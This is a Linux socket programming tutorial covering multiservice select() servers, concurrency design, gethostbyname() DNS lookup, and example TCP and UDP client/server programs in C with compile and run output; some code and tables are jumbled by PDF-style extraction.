{ char */ char */ struct sockaddr_in fsin; /* the request from address */ int alen; /* from-address length */ int tsock; /* TCP master socket */ int usock; /* UDP socket */ int nfds; fd_set rfds; /* readable file descriptors */ tsock = passiveTCP(service, QLEN); usock = passiveUDP(service); /* bit number of max fd */ nfds = MAX(tsock, usock) + 1; FD_ZERO(&rfds); while (1) { FD_SET(tsock, &rfds); FD_SET(usock, &rfds); if(select(nfds, &rfds, (fd_set *)0, (fd_set *)0, (struct timeval *)0) < 0) errexit("select error: %s\n", strerror(errno)); if(FD_ISSET(tsock, &rfds)) { /* TCP slave socket */ int ssock; alen = sizeof(fsin); ssock = accept(tsock, (struct sockaddr *)&fsin, &alen); if(ssock < 0) errexit("accept failed: %s\n", strerror(errno)); daytime(buf); (void) write(ssock, buf, strlen(buf)); (void) close(ssock); } if(FD_ISSET(usock, &rfds)) { alen = sizeof(fsin); if(recvfrom(usock, buf, sizeof(buf), 0, (struct sockaddr *)&fsin, &alen) < 0) errexit("recvfrom: %s\n", strerror(errno)); daytime(buf); (void) sendto(usock, buf, strlen(buf), 0, (struct sockaddr *)&fsin, sizeof(fsin)); } } } buf[LINELEN+1]; /* buffer for one line of text *service = "daytime"; /* service name or port number

int daytime(char buf[]) { char *ctime(); time_t now; (void) time(&now); sprintf(buf, "%s", ctime(&now)); } Multiservice Servers Why combine services into one server? Fewer processes. Less memory. Less code duplication. Server complexity is really a result of accepting connections and handling concurrency. Having one server means the complex code does not need to be replicated. Iterative Connectionless Server Design Server opens multiple UDP sockets each bound to a different port. Server keeps an array of function pointers to associate each socket with a service functions. Server uses select to determine which socket (port) to service next and calls the proper service function. Iterative Connection-Oriented Server Design Server opens multiple passive TCP sockets each bound to a different port. Server keeps an array of function pointers to associate each socket with a service functions. Server uses select to determine which socket (port) to service next. When a connection is ready, server calls accept to start handling a connection. Server calls the proper service function. Concurrent Connection-Oriented Server Design Master uses select to wait for connections over a set of passive TCP sockets. Master forks after accept. Slave handles communication with the client. Single-Process Server Design Master uses select to wait for connections over a set of passive TCP sockets. After each accept the new socket is added to the fd_set(s) as needed to handle client communication. Complex if the client protocols are not trivial. Invoking Separate Programs from a Server Master uses select() to wait for connections over a set of passive TCP sockets. Master forks after accept. Child process uses execve to start a slave program to handle client communication. Different protocols are separated making it simpler to maintain. Changes to a slave program can be implemented without restarting the master.

Multiservice, Multiprotocol Servers Master uses select to wait for connections over a set of passive TCP sockets. In addition the fd_set includes a set of UDP sockets awaiting client messages. If a UDP message arrives, the master calls a handler function which formulates and issues a reply. If a TCP connection is needed the master calls accept. For simpler TCP connections, the master can handle read and write requests iteratively. The master can also use select. Lastly the master can use fork and let the child handle the connection. Super Server Code Example The following is a sample codes for super server. struct service { char *sv_name; char sv_useTCP; int sv_sock; int (*sv_func)(int); }; struct service svent[ ] = { { "echo", TCP_SERV, NOSOCK, TCPechod }, { "chargen", TCP_SERV, NOSOCK, TCPchargend }, { "daytime", TCP_SERV, NOSOCK, TCPdaytimed }, { "time", TCP_SERV, NOSOCK, TCPtimed }, { 0, 0, 0, 0 }, }; int main(int argc, char *argv[ ]) { struct service *psv, /* service table pointer */ *fd2sv[NOFILE]; /* map fd to service pointer */ int fd, nfds; fd_set afds, rfds; /* readable file descriptors */ nfds = 0; FD_ZERO(&afds); for(psv = &svent[0]; psv->sv_name; ++psv) { if(psv->sv_useTCP) psv->sv_sock = passiveTCP(psv->sv_name, QLEN); else psv->sv_sock = passiveUDP(psv->sv_name); fd2sv[psv->sv_sock] = psv; nfds = MAX(psv->sv_sock+1, nfds); FD_SET(psv->sv_sock, &afds); } (void) signal(SIGCHLD, reaper); while (1) {

memcpy(&rfds, &afds, sizeof(rfds)); if(select(nfds, &rfds, (fd_set *)0, (fd_set *)0, (struct timeval *)0) < 0) { if(errno == EINTR) continue; errexit("select error: %s\n", strerror(errno)); } for(fd=0; fd<nfds; ++fd) { if(FD_ISSET(fd, &rfds)) { psv = fd2sv[fd]; if(psv->sv_useTCP) doTCP(psv); else psv->sv_func(psv->sv_sock); } } } } /* doTCP() - handle a TCP service connection request */ void doTCP(struct service *psv) { /* the request from address */ struct sockaddr_in fsin; /* from-address length */ int alen; int fd, ssock; alen = sizeof(fsin); ssock = accept(psv->sv_sock, (struct sockaddr *)&fsin, &alen); if(ssock < 0) errexit("accept: %s\n", strerror(errno)); switch (fork()) { case 0: break; case -1: errexit("fork: %s\n", strerror(errno)); default: (void) close(ssock); /* parent */ return; } /* child */ for(fd = NOFILE; fd >= 0; --fd)

if(fd != ssock) (void) close(fd); exit(psv->sv_func(ssock)); } /* reaper() - clean up zombie children */ void reaper(int sig) { int status; while(wait3(&status, WNOHANG, (struct rusage *)0) >= 0) /* empty */; }

NETWORK PROGRAMMING LINUX SOCKET PART 8 - TCP & UDP PROGRAM EXAMPLES
Working program examples if any compiled using gcc, tested using the public IPs, run on Linux/Fedora Core 3, with several times of update, as normal user. The Fedora machine used for the testing having the "No Stack Execute" disabled and the SELinux set to default configuration. Some Idea In Managing Server Concurrency Concurrency vs Iteration Making the decision Program design is vastly different. Programmer needs to decide early. Network and computer speeds also keep changing. Optimality is a moving target. Programmer must use insight based on experience to decide which is better. Level of Concurrency Number of concurrent clients. Iterative means 1 client at a time. Unbounded concurrency allows flexibility. TCP software limits the number of connections. OS limits each process to a fixed number of open files. OS limits the number of processes. Problems with Unbounded Concurrency OS can run out of resources such as memory, processes, sockets, buffers causing blocking, thrashing, crashing... Demand for one service can inhibit others e.g. web server may prevent other use. Over-use can limit performance e.g. ftp server could be so slow that clients cancel requests wasting time spent doing a partial transfer. Cost of Concurrency

Assuming a forking concurrent server, each connection requires time for a process creation (c). Each connection also requires some time for processing requests (p). Consider 2 requests arriving at the same time. Iterative server completes both at time 2p. Concurrent server completes both perhaps at time 2c+p. If p < 2c the iterative server is faster. The situation can get worse with more requests. The number of active processes can exceed the CPU capacity. Servers with heavy loads generally try to dodge the process creation cost. Process Pre-allocation to Limit Delays Master server process forks n times. The n slaves handle up to n clients. Operates like n iterative servers. Due to child processes inheriting the parent's passive socket, the slaves can all wait in accept on the same socket. For UDP, the slaves can all call recvfrom on the same socket. To avoid problems like memory leaks, the slaves can be periodically replaced. For UDP, bursts can overflow buffers causing data loss. Pre-allocation can limit this problem. Dynamic Pre-allocation Pre-allocation can cause extra processing time if many slaves are all waiting on the same socket. If the server is busy, it can be better to have many slaves pre-allocated. If the server is idle, it can be better to have very few slaves pre-allocated. Some servers (Apache) adjust the level of concurrency according to service demand. Delayed Allocation Rather than immediately forking, the master can quickly examine a request. It may be faster for some requests to handle them in the master rather than forking. Longer requests may be more appropriate to handle in a child process. If it is hard to quickly estimate processing time, the server can set a timer to expire after a small time and then fork to let a child finish the request. Client Concurrency Shorter Response Time. Increased Throughput. Concurrency Allows Better Control. Communicating with Multiple Servers. Achieving Concurrency with a Single Client Process.

--The Linux Socket Program Examples Sections-DNS

DNS stands for "Domain Name System" (for Windows implementation it is called Domain Name Service). For socket it has three major components:

Domain name space and resource records: Specifications for a treestructured name space and the data associated with the names. 2. Name servers: Server programs that hold information about the domain tree structure and that set information. 3. Resolvers: Programs that extract information from name servers in response to client requests.
1.

DNS used to translate the IP address to domain name and vice versa. This way, when someone enters: telnet serv.google.com telnet can find out that it needs to connect() to let say, "198.137.240.92". To get these information we can use gethostbyname(): #include <netdb.h> struct hostent *gethostbyname(const char *name); As you see, it returns a pointer to a struct hostent, and struct hostent is shown below: struct hostent { char *h_name; char **h_aliases; int h_addrtype; int h_length; char **h_addr_list; }; #define h_addr h_addr_list[0] And the descriptions: Member Description h_name Official name of the host. h_aliases A NULL-terminated array of alternate names for the host. h_addrtype The type of address being returned; usually AF_INET. h_length The length of the address in bytes. A zero-terminated array of network addresses for the host. Host h_addr_list addresses are in Network Byte Order. h_addr The first address in h_addr_list. Table 40.1 gethostbyname() returns a pointer to the filled struct hostent, or NULL on error but errno is not set, h_errno is set instead. As said before in implementation we use Domain Name Service in Windows and BIND in Unix/Linux. Here, we configure the Forward Lookup Zone for name to IP resolution and Reverse Lookup Zone for the reverse. The following is a program example using the gethostname(). /*****getipaddr.c ******/ /****a hostname lookup program example******/

#include #include #include #include #include #include #include #include

<stdio.h> <stdlib.h> <errno.h> <netdb.h> <sys/types.h> <sys/socket.h> <netinet/in.h> <arpa/inet.h>

int main(int argc, char *argv[ ]) { struct hostent *h; /* error check the command line */ if(argc != 2) { fprintf(stderr, "Usage: %s <domain_name>\n", argv[0]); exit(1); } /* get the host info */ if((h=gethostbyname(argv[1])) == NULL) { herror("gethostbyname(): "); exit(1); } else printf("gethostbyname() is OK.\n"); printf("The host name is: %s\n", h->h_name); printf("The IP Address is: %s\n", inet_ntoa(*((struct in_addr *)h->h_addr))); printf("The address length is: %d\n", h->h_length); printf("Sniffing other names...sniff...sniff...sniff...\n"); int j = 0; do { printf("An alias #%d is: %s\n", j, h->h_aliases[j]); j++; } while(h->h_aliases[j] != NULL); printf("Sniffing other IPs...sniff....sniff...sniff...\n"); int i = 0; do {

printf("Address #%i is: %s\n", i, inet_ntoa(*((struct in_addr *)(h->h_addr_list[i])))); i++; } while(h->h_addr_list[i] != NULL); return 0; } Compile and link the program. [bodo@bakawali testsocket]$ gcc -g getipaddr.c -o getipaddr Run the program. Because of the server used in this testing is using public IP address, we can test it querying the public domain such as www.yahoo.com. [bodo@bakawali testsocket]$ ./getipaddr www.yahoo.com The host name is: www.yahoo.akadns.net The IP Address is: 66.94.230.50 The address length is: 4 Sniffing other names...sniff...sniff...sniff... An alias #0 is: www.yahoo.com Sniffing other IPs...sniff....sniff...sniff... Address #0 is: 66.94.230.50 Address #1 is: 66.94.230.36 Address #2 is: 66.94.230.41 Address #3 is: 66.94.230.34 Address #4 is: 66.94.230.47 Address #5 is: 66.94.230.32 Address #6 is: 66.94.230.35 Address #7 is: 66.94.230.45 Again, running the program testing another domain. [bodo@bakawali testsocket]$ ./getipaddr www.google.com The host name is: www.l.google.com The IP Address is: 66.102.7.104 The address length is: 4 Sniffing other names...sniff...sniff...sniff... An alias #0 is: www.google.com Sniffing other IPs...sniff....sniff...sniff... Address #0 is: 66.102.7.104 Address #1 is: 66.102.7.99 Address #2 is: 66.102.7.147 [bodo@bakawali testsocket]$

With gethostbyname(), you cant use perror() to print error message since errno is not used instead, call herror(). You simply pass the string that contains the machine name ("www.google.com") to gethostbyname(), and then grab the information out of the returned struct hostent.

The only possible weirdness might be in the printing of the IP address. Here, h>h_addr is a char*, but inet_ntoa() wants a struct in_addr passed to it. So we need to cast h->h_addr to a struct in_addr*, then dereference it to get the data. Some Client-Server Background Just about everything on the network deals with client processes talking to server processes and vice-versa. For example take a telnet. When you telnet to a remote host on port 23 at client, a program on that server normally called telnetd (telnet daemon), will respond. It handles the incoming telnet connection, sets you up with a login prompt, etc. In Windows this daemon normally called a service. The daemon or service must be running in order to do the communication. Note that the client-server pair can communicate using SOCK_STREAM, SOCK_DGRAM, or anything else (as long as theyre using the same protocol). Some good examples of client-server pairs are telnet/telnetd, ftp/ftpd, or bootp/bootpd. Every time you use ftp, theres a remote program, ftpd that will serve you. Often, there will only be one server, and that server will handle multiple clients using fork() etc. The basic routine is: server will wait for a connection, accept() it and fork() a child process to handle it. The following program example is what our sample server does. A Simple Stream Server Program Example What this server does is send the string "This is a test string from server!" out over a stream connection. To test this server, run it in one window and telnet to it from another window or run it in a server and telnet to it from another machine with the following command. telnet the_remote_hostname 3490 Where the_remote_hostname is the name of the machine youre running it on. The following is the server source code: /* serverprog.c - a stream socket server demo */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/wait.h> #include <signal.h>

/* the port users will be connecting to */ #define MYPORT 3490 /* how many pending connections queue will hold */ #define BACKLOG 10

void sigchld_handler(int s) { while(wait(NULL) > 0); } int main(int argc, char *argv[ ]) { /* listen on sock_fd, new connection on new_fd */ int sockfd, new_fd; /* my address information */ struct sockaddr_in my_addr; /* connectors address information */ struct sockaddr_in their_addr; int sin_size; struct sigaction sa; int yes = 1; if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("Server-socket() error lol!"); exit(1); } else printf("Server-socket() sockfd is OK...\n"); if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1) { perror("Server-setsockopt() error lol!"); exit(1); } else printf("Server-setsockopt is OK...\n"); /* host byte order */ my_addr.sin_family = AF_INET; /* short, network byte order */ my_addr.sin_port = htons(MYPORT); /* automatically fill with my IP */ my_addr.sin_addr.s_addr = INADDR_ANY; printf("Server-Using %s and port %d...\n", inet_ntoa(my_addr.sin_addr), MYPORT); /* zero the rest of the struct */ memset(&(my_addr.sin_zero), '\0', 8);

if(bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) { perror("Server-bind() error"); exit(1); } else printf("Server-bind() is OK...\n"); if(listen(sockfd, BACKLOG) == -1) { perror("Server-listen() error"); exit(1); } printf("Server-listen() is OK...Listening...\n"); /* clean all the dead processes */ sa.sa_handler = sigchld_handler; sigemptyset(&sa.sa_mask); sa.sa_flags = SA_RESTART; if(sigaction(SIGCHLD, &sa, NULL) == -1) { perror("Server-sigaction() error"); exit(1); } else printf("Server-sigaction() is OK...\n"); /* accept() loop */ while(1) { sin_size = sizeof(struct sockaddr_in); if((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) { perror("Server-accept() error"); continue; } else printf("Server-accept() is OK...\n"); printf("Server-new socket, new_fd is OK...\n"); printf("Server: Got connection from %s\n", inet_ntoa(their_addr.sin_addr)); /* this is the child process */ if(!fork()) {

/* child doesnt need the listener */ close(sockfd); if(send(new_fd, "This is a test string from server!\n", 37, 0) == -1) perror("Server-send() error lol!"); close(new_fd); exit(0); } else printf("Server-send is OK...!\n"); /* parent doesnt need this*/ close(new_fd); printf("Server-new socket, new_fd closed successfully...\n"); } return 0; }
Compile and link the program. [bodo@bakawali testsocket]$ gcc serverprog

-g

serverprog.c

-o

Run the program. [bodo@bakawali testsocket]$ ./serverprog Server-socket() sockfd is OK... Server-setsockopt() is OK... Server-Using 0.0.0.0 and port 3490... Server-bind() is OK... Server-listen() is OK...Listening... Server-sigaction() is OK...

[1]+ Stopped [bodo@bakawali testsocket]$

./serverprog

Verify that the program is running in the background. You may do this from another terminal. [bodo@bakawali testsocket]$ bg [1]+ ./serverprog & Verify that the program/process is listening on the specified port, waiting for connection. [bodo@bakawali testsocket]$ netstat -a | grep 3490 tcp 0 0 *:3490 *:* LISTEN
Again, verify that the program/process is listening, waiting for connection. [bodo@bakawali testsocket]$ ps aux | grep serverprog bodo 2586 0.0 0.2 2940 296 pts/3 S 14:04 0:00 ./serverprog bodo 2590 0.0 0.5 5432 660 pts/3 R+ 14:04 0:00 grep serverprog

Then, trying the telnet. Open another terminal, telnet itself with the specified port number. Here we use the server name, bakawali. When the string is displayed press the Escape character Ctrl+] ( ^] ). Then we have a real telnet session. [bodo@bakawali testsocket]$ telnet bakawali 3490 Trying 203.106.93.94... Connected to bakawali.jmti.gov.my (203.106.93.94). Escape character is '^]'. This is the test string from server! ^] telnet> ? Commands may be abbreviated. Commands are: close logout connection display mode for more) open quit send set unset status toggle more) slc more) auth encrypt forward for more) z ! environ more) ? telnet>

close current connection forcibly logout remote user and close the display operating parameters try to enter line or character mode ('mode ?' connect to a site exit telnet transmit special characters ('send ?' for more) set operating parameters ('set ?' for more) unset operating parameters ('unset ?' for more) print status information toggle operating parameters ('toggle ?' for change state of special charaters ('slc ?' for turn on (off) authentication ('auth ?' for more) turn on (off) encryption ('encrypt ?' for more) turn on (off) credential forwarding ('forward ?' suspend telnet invoke a subshell change environment variables ('environ ?' for print help information

Type quit to exit the session.

... telnet> quit Connection closed. [bodo@bakawali ~]$

If we do not stop the server program/process (Ctrl+Z), at the server terminal the following messages should be displayed. Press Enter (Carriage Return) key back to the prompt.

[bodo@bakawali testsocket]$ ./serverprog Server-socket() sockfd is OK... Server-setsockopt() is OK... Server-Using 0.0.0.0 and port 3490... Server-bind() is OK... Server-listen() is OK...Listening... Server-sigaction() is OK... Server-accept() is OK... Server-new socket, new_fd is OK... Server: Got connection from 203.106.93.94 Server-send() is OK...! Server-new socket, new_fd closed successfully... To stop the process just issue a normal kill command. Before that verify again. [bodo@bakawali testsocket]$ netstat -a | grep 3490 tcp 0 0 *:3490 *:* LISTEN [bodo@bakawali testsocket]$ ps aux | grep ./serverprog bodo 3184 0.0 0.2 1384 324 pts/3 S 23:46 0:00 ./serverprog bodo 3188 0.0 0.5 3720 652 pts/3 R+ 23:48 0:00 grep ./serverprog [bodo@bakawali testsocket]$ kill -9 3184 [bodo@bakawali testsocket]$ netstat -a | grep 3490 [1]+ Killed ./serverprog [bodo@bakawali testsocket]$

The server program seems OK. Next section is a client program, clientprog.c that we will use to test our server program,serverprog.c. The sigaction() code is responsible for cleaning the zombie processes that appear as the forked child processes. You will get the message from this server by using the client program example presented in the next section.

NETWORK PROGRAMMING SOCKET PART 9 - CLIENT & SERVER PROGRAM EXAMPLES


Working program examples if any compiled using gcc, tested using the public IPs, run on Linux/Fedora Core 3, with several times of update, as normal user. The Fedora machine used for the testing having the "No Stack Execute" disabled and the SELinux set to default configuration. A Simple Stream Client Program Example This client will connect to the host that you specify in the command line, with port 3490. It will get the string that the previous server sends. The following is the source code.

/*** clientprog.c ****/ /*** a stream socket client demo ***/ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> // the port client will be connecting to #define PORT 3490 // max number of bytes we can get at once #define MAXDATASIZE 300 int main(int argc, char *argv[]) { int sockfd, numbytes; char buf[MAXDATASIZE]; struct hostent *he; // connectors address information struct sockaddr_in their_addr; // if no command line argument supplied if(argc != 2) { fprintf(stderr, "Client-Usage: %s the_client_hostname\n", argv[0]); // just exit exit(1); } // get the host info if((he=gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); } else printf("Client-The remote host is: %s\n", argv[1]); if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket()"); exit(1);

} else printf("Client-The socket() sockfd is OK...\n"); // host byte order their_addr.sin_family = AF_INET; // short, network byte order printf("Server-Using %s and port %d...\n", argv[1], PORT); their_addr.sin_port = htons(PORT); their_addr.sin_addr = *((struct in_addr *)he->h_addr); // zero the rest of the struct memset(&(their_addr.sin_zero), '\0', 8); if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { perror("connect()"); exit(1); } else printf("Client-The connect() is OK...\n"); if((numbytes = recv(sockfd, buf, MAXDATASIZE-1, 0)) == -1) { perror("recv()"); exit(1); } else printf("Client-The recv() is OK...\n"); buf[numbytes] = '\0'; printf("Client-Received: %s", buf); printf("Client-Closing sockfd\n"); close(sockfd); return 0; } Compile and link the program. [bodo@bakawali testsocket]$ gcc -g clientprog.c -o clientprog Run the program without argument. [bodo@bakawali testsocket]$ ./clientprog Client-Usage: ./clientprog the_client_hostname

Run the program with server IP address or name as an argument. Here we use IP address.

Make sure your previous serverprog program is running. We will connect using the same server. You can try running the server and client program at different machines. [bodo@bakawali testsocket]$ ./clientprog 203.106.93.94 ... [bodo@bakawali testsocket]$ ./clientprog bakawali Client-The remote host is: bakawali Client-The socket() sockfd is OK... Server-Using bakawali and port 3490... Client-The connect() is OK... Client-The recv() is OK... Client-Received: This is the test string from server! Client-Closing sockfd
Verify the connection. [bodo@bakawali testsocket]$ netstat -a | grep 3490 tcp 0 0 *:3490 *:* tcp 0 0 bakawali.jmti.gov.my:3490 bakawali.jmti.gov.my:1358 TIME_WAIT [bodo@bakawali testsocket]$ At servers console, we have the following messages. [bodo@bakawali testsocket]$ ./serverprog Server-socket() sockfd is OK... Server-setsockopt() is OK... Server-Using 0.0.0.0 and port 3490... Server-bind() is OK... Server-listen() is OK...Listening... Server-sigaction() is OK... Server-accept() is OK... Server-new socket, new_fd is OK... Server: Got connection from 203.106.93.94 Server-send() is OK...! Server-new socket, new_fd closed successfully...

LISTEN

Well, our server and client programs work! Here we run the server program and let it listens for connection. Then we run the client program. They got connected! Notice that if you dont run the server before you run the client, connect() returns "Connection refused" message as shown below. [bodo@bakawali testsocket]$ ./clientprog bakawali Client-The remote host is: bakawali Client-The socket() sockfd is OK... Server-Using bakawali and port 3490... connect: Connection refused Datagram Sockets: The Connectionless

The following program examples use the UDP, the connectionless datagram. The senderprog.c (client) is sending a message to receiverprog.c (server) that acts as listener. /*receiverprog.c - a server, datagram sockets*/ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> /* the port users will be connecting to */ #define MYPORT 4950 #define MAXBUFLEN 500 int main(int argc, char *argv[]) { int sockfd; /* my address information */ struct sockaddr_in my_addr; /* connectors address information */ struct sockaddr_in their_addr; int addr_len, numbytes; char buf[MAXBUFLEN]; if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { perror("Server-socket() sockfd error lol!"); exit(1); } else printf("Server-socket() sockfd is OK...\n"); /* host byte order */ my_addr.sin_family = AF_INET; /* short, network byte order */ my_addr.sin_port = htons(MYPORT); /* automatically fill with my IP */ my_addr.sin_addr.s_addr = INADDR_ANY; /* zero the rest of the struct */ memset(&(my_addr.sin_zero), '\0', 8); if(bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) { perror("Server-bind() error lol!");

exit(1); } else printf("Server-bind() is OK...\n"); addr_len = sizeof(struct sockaddr); if((numbytes = recvfrom(sockfd, buf, MAXBUFLEN-1, 0, (struct sockaddr *)&their_addr, &addr_len)) == -1) { perror("Server-recvfrom() error lol!"); /*If something wrong, just exit lol...*/ exit(1); } else { printf("Server-Waiting and listening...\n"); printf("Server-recvfrom() is OK...\n"); } printf("Server-Got packet from %s\n", inet_ntoa(their_addr.sin_addr)); printf("Server-Packet is %d bytes long\n", numbytes); buf[numbytes] = '\0'; printf("Server-Packet contains \"%s\"\n", buf); if(close(sockfd) != 0) printf("Server-sockfd closing failed!\n"); else printf("Server-sockfd successfully closed!\n"); return 0; }
Compile and link the program. [bodo@bakawali testsocket]$ gcc -g receiverprog.c -o receiverprog

Run the program, and then verify that it is running in background, start listening, waiting for connection. [bodo@bakawali testsocket]$ ./receiverprog Server-socket() sockfd is OK... Server-bind() is OK... [1]+ Stopped ./receiverprog [bodo@bakawali testsocket]$ bg [1]+ ./receiverprog & [bodo@bakawali testsocket]$ netstat -a | grep 4950 udp 0 0 *:4950 *:*

[bodo@bakawali testsocket]$ This is UDP server, trying telnet to this server will fail because telnet uses TCP instead of UDP. [bodo@bakawali testsocket]$ telnet 203.106.93.94 4950 Trying 203.106.93.94... telnet: connect to address 203.106.93.94: Connection refused telnet: Unable to connect to remote host: Connection refused [bodo@bakawali testsocket]$ Notice that in our call to socket() were using SOCK_DGRAM. Also, note that theres no need to listen() or accept(). The following is the source code for senderprog.c (the client). /*senderprog.c - a client, datagram*/ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> /* the port users will be connecting to */ #define MYPORT 4950

int main(int argc, char *argv[ ]) { int sockfd; /* connectors address information */ struct sockaddr_in their_addr; struct hostent *he; int numbytes; if (argc != 3) { fprintf(stderr, "Client-Usage: %s <hostname> <message>\n", argv[0]); exit(1); } /* get the host info */ if ((he = gethostbyname(argv[1])) == NULL) { perror("Client-gethostbyname() error lol!"); exit(1); } else

printf("Client-gethostname() is OK...\n"); if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { perror("Client-socket() error lol!"); exit(1); } else printf("Client-socket() sockfd is OK...\n"); /* host byte order */ their_addr.sin_family = AF_INET; /* short, network byte order */ printf("Using port: 4950\n"); their_addr.sin_port = htons(MYPORT); their_addr.sin_addr = *((struct in_addr *)he->h_addr); /* zero the rest of the struct */ memset(&(their_addr.sin_zero), '\0', 8); if((numbytes = sendto(sockfd, argv[2], strlen(argv[2]), 0, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == -1) { perror("Client-sendto() error lol!"); exit(1); } else printf("Client-sendto() is OK...\n"); printf("sent %d bytes to %s\n", numbytes, inet_ntoa(their_addr.sin_addr)); if (close(sockfd) != 0) printf("Client-sockfd closing is failed!\n"); else printf("Client-sockfd successfully closed!\n"); return 0; }
Compile and link the program. [bodo@bakawali testsocket]$ gcc -g senderprog.c -o senderprog Run the program without arguments. [bodo@bakawali testsocket]$ ./senderprog Client-Usage: ./senderprog <hostname> <message>

Run the program with arguments. [bodo@bakawali testsocket]$ ./senderprog 203.106.93.94 "Testing UDP datagram message from client" Client-gethostname() is OK... Client-socket() sockfd is OK...

Using port: 4950 Server-Waiting and listening... Server-recvfrom() is OK... Server-Got packet from 203.106.93.94 Server-Packet is 42 bytes long Server-Packet contains "Testing UDP datagram message from client" Server-sockfd successfully closed! Client-sendto() is OK... sent 42 bytes to 203.106.93.94 Client-sockfd successfully closed! [1]+ Done ./receiverprog [bodo@bakawali testsocket]$ Here, we test the UDP server and the client using the same machine. Make sure there is no restriction such as permission etc. for the user that run the programs. To make it really real, may be you can test these programs by running receiverprog on some machine, and then run senderprog on another. If there is no error, they should communicate. If senderprog calls connect() and specifies the receiverprogs address then the senderprog may only sent to and receive from the address specified by connect(). For this reason, you dont have to use sendto() and recvfrom(); you can simply use send() and recv(). Blocking In a simple word 'block' means sleep but in a standby mode. You probably noticed that when you run receiverprog, previously, it just sits there until a packet arrives. What happened is that it called recvfrom(), there was no data, and so recvfrom() is said to "block" (that is, sleep there) until some data arrives. The socket functions which can block are: 1. accept() 2. read() 3. readv() 4. recv() 5. recvfrom() 6. recvmsg() 7. send() 8. sendmsg() 9. sendto() 10. write() 11. writev() The reason they can do this is because theyre allowed to. When you first create the socket descriptor with socket(), the kernel sets it to blocking. If you dont want a socket to be blocking, you have to make a call to fcntl() something like the following: #include <unistd.h>

#include <fcntl.h> ... ... sockfd = socket(AF_INET, SOCK_STREAM, 0); fcntl(sockfd, F_SETFL, O_NONBLOCK); ... ...

By setting a socket to non-blocking, you can effectively 'poll' the socket for information. If you try to read from a non-blocking socket and theres no data there, its not allowed to block, it will return -1 and errno will be set to EWOULDBLOCK. Generally speaking, however, this type of polling is a bad idea. If you put your program in a busy-wait looking for data on the socket, youll suck up CPU time. A more elegant solution for checking to see if theres data waiting to be read comes in the following section on select().

Using select() for I/O multiplexing One traditional way to write network servers is to have the main server block on accept(), waiting for a connection. Once a connection comes in, the server forks, then the child process handles the connection and the main server is able to service new incoming requests. With select(), instead of having a process for each request, there is usually only one process that multiplexes all requests, servicing each request as much as it can. So one main advantage of using select() is that your server will only require a single process to handle all requests. Thus, your server will not need shared memory or synchronization primitives for different tasks to communicate. As discussed before we can use the non-blocking sockets functions but it is CPU intensive. One major disadvantage of using select(), is that your server cannot act like there's only one client, like with a forking solution. For example, with a forking solution, after the server forks, the child process works with the client as if there was only one client in the universe, the child does not have to worry about new incoming connections or the existence of other sockets. With select(), the programming isn't as transparent. The prototype is as the following: #include <sys/time.h> #include <sys/types.h> #include <unistd.h> int select(int numfds, fd_set *readfds, fd_set *writefds, fd_set *exceptfds, struct timeval *timeout);

The function monitors "sets" of file descriptors; in particular readfds, writefds, and exceptfds. If you want to see if you can read from standard input and some socket descriptor, sockfd, just add the file descriptors 0 and sockfd to the set readfds.

The parameter numfds should be set to the values of the highest file descriptor plus one. In this example, it should be set to sockfd+1, since it is assuredly higher than standard input that is 0. When select() returns, readfds will be modified to reflect which of the file descriptors you have selected which is ready for reading. You can test them with the macro FD_ISSET() listed below. Let see how to manipulate these sets. Each set is of the type fd_set. The following macros operate on this type: 1. FD_ZERO(fd_set *set) clears a file descriptor set. 2. FD_SET(int fd, fd_set *set) adds fd to the set. 3. FD_CLR(int fd, fd_set *set) removes fd from the set. 4. FD_ISSET(int fd, fd_set *set) tests to see if fd is in the set. select() works by blocking until something happens on a file descriptor/socket. The 'something' is the data coming in or being able to write to a file descriptor, you tell select() what you want to be woken up by. How do you tell it? You fill up an fd_set structure with some macros. Most select() based servers look quite similar: 1. Fill up an fd_set structure with the file descriptors you want to know when data comes in on. 2. Fill up an fd_set structure with the file descriptors you want to know when you can write on. 3. Call select() and block until something happens. 4. Once select() returns, check to see if any of your file descriptors was the reason you woke up. If so, 'service' that file descriptor in whatever particular way your server needs to (i.e. read in a request for a Web page). 5. Repeat this process forever.

Sometimes you dont want to wait forever for someone to send you some data. Maybe every 60 seconds you want to print something like "Processing..." to the terminal even though nothing has happened. The timeval structure allows you to specify a timeout period. If the time is exceeded and select() still hasnt found any ready file descriptors, itll return, so you can continue processing. The struct timeval has the following fields: struct timeval { int tv_sec; /* seconds */ int tv_usec; /* microseconds */ };

Just set tv_sec to the number of seconds to wait, and set tv_usec to the number of microseconds to wait. There are 1,000,000 microseconds in a second. Also, when the function returns, timeout might be updated to show the time still remaining. Standard UNIX time slice is around 100 milliseconds, so you might have to wait that long no matter how small you set your struct timeval.

